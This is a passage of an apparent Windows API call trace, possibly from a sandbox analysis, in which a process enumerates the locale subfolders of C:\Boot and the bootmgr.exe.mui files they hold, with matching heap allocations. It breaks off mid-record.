[0033.124] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0033.124] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.124] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.125] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.125] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.125] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.125] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.125] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0033.125] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.125] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.126] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.126] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.126] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.126] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.126] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.126] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.127] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.127] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.127] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.127] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.127] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0033.127] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.127] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.127] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.127] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.127] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.127] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.128] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0033.128] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.128] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.128] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.128] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.129] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.129] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.129] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0033.129] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.129] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.129] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.129] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.129] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.129] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.129] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0033.129] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.129] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.130] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.130] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.130] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.131] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.131] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0033.131] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.131] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.131] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.131] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.131] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.131] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.131] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0033.131] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.131] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.132] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.132] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.132] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.132] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.132] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0033.133] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.133] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.133] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.133] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.133] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.133] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.133] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0033.133] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.133] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 